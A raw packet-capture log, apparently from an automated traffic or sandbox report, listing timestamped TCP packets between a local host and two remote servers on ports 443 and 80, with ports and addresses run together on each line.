                                                                                Feb 16, 2021 00:57:39.691066027 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.691087008 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.692198038 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.692250013 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.692280054 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.692303896 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.693495989 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.693577051 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.693593979 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.693648100 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.694644928 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.694689989 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.694727898 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.694727898 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.694740057 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.694771051 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.695844889 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.695899010 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.695914030 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.695951939 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.697097063 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.697149038 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.697174072 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.697206020 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.698256016 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.698299885 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.698312044 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.698357105 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.699438095 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.699495077 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.699516058 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.699542046 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.700627089 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.700670958 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.700697899 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.700715065 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.701839924 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.701883078 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.701916933 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.701944113 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.703202009 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.703249931 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.703284979 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.703309059 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.704281092 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.704336882 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.704372883 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.704380035 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.704396009 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.704421043 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.704432964 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.704466105 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.726563931 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.726592064 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.726664066 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.726747036 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.727300882 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.727354050 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.727356911 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.727406025 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.728262901 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.728306055 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.728332043 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.728391886 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.729255915 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.729285002 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.729360104 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.729376078 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.730170965 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.730192900 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.730261087 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.730282068 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.731144905 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.731168985 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.731225967 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.731245995 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.732144117 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.732167006 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.732220888 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.732244015 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.733184099 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.733222008 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.733278990 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.733361959 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.734200954 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.734235048 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.734285116 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.734333992 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.735156059 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.735186100 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.735222101 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.735245943 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.736171007 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.736201048 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.736263990 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.737143993 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.737174034 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.737200975 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.737222910 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:58:11.010833979 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.010863066 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.010879993 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.010895967 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.010898113 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.010915041 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.010932922 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.010934114 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.010965109 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.010987043 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.013912916 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.013935089 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.013947010 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.013958931 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.013972044 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.013984919 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.014039040 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.014072895 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.017230988 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.017282009 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.050714970 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050765038 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050792933 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050810099 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050827026 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050839901 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.050843954 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050859928 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050863028 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.050884962 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050899982 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050909996 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.050920010 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050929070 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.050932884 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050945997 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.050973892 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.051120043 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.052489996 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052536011 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052562952 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052577019 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052592993 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052597046 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052602053 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052606106 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052624941 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.052649021 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.052651882 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.052654028 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.052860022 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052882910 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052896023 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052912951 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052925110 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052932978 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.052943945 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.052962065 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.052984953 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.053069115 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.066737890 CET4977580192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.113842964 CET804977534.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.253958941 CET4977680192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.343611002 CET804977634.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.377232075 CET804977634.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:11.377315998 CET4977680192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.379357100 CET4977680192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:11.425200939 CET804977634.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:13.848558903 CET4978180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:13.848582983 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:13.893874884 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:13.893918991 CET804978134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:13.894028902 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:13.894056082 CET4978180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:13.894741058 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:13.982933998 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.372047901 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.372087955 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.372144938 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.372186899 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.372222900 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.372231007 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.372275114 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.372277021 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.372323990 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.372344971 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.412328959 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.412411928 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.412475109 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.412519932 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.412533998 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.412559986 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.412585020 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.418257952 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418308973 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418358088 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418401957 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418401003 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.418441057 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418447018 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.418463945 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.418482065 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418492079 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.418521881 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418570042 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418577909 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.418596983 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.418620110 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.418658972 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.452771902 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.452806950 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.452910900 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.455369949 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.455506086 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.459072113 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459120989 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459150076 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459155083 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.459177971 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459187984 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.459203005 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.459206104 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459224939 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.459239960 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459263086 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459285975 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.459314108 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.459347010 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.459386110 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.465579987 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.465632915 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.465668917 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.465704918 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.465740919 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.465756893 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.465776920 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.465781927 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.465810061 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.465826988 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.465861082 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.493999958 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.494019985 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.494040012 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.494055986 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.494072914 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.494101048 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.494146109 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.499258041 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.499361992 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.535033941 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535063982 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535088062 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535109043 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535135031 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535157919 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535161018 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.535180092 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535202980 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535223961 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535233021 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.535247087 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535254955 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.535264969 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535281897 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.535284042 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.535324097 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.535346031 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.536604881 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.536623955 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.536638975 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.536662102 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.536684036 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.536710978 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.536762953 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.536791086 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.539413929 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.539490938 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.576071978 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.576136112 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.576155901 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.576181889 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.576216936 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.576220989 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.576248884 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.576261997 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.576280117 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.576302052 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.576342106 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:14.576359034 CET4978080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:14.576380968 CET804978034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371536970 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371567011 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371582985 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371596098 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371608973 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371625900 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371629953 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.371646881 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371653080 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.371671915 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371690035 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.371715069 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.371757030 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.419929028 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.419954062 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.419970036 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.419990063 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420008898 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420025110 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420038939 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.420047998 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420068979 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420085907 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420101881 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420119047 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420130968 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.420145035 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420164108 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420180082 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420188904 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.420202971 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420228004 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420245886 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420254946 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.420269012 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420285940 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420300007 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.420340061 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.420443058 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.420452118 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.468916893 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.468976974 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469038963 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469078064 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469115973 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469161987 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469163895 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469221115 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469271898 CET804979834.65.144.159192.168.2.4
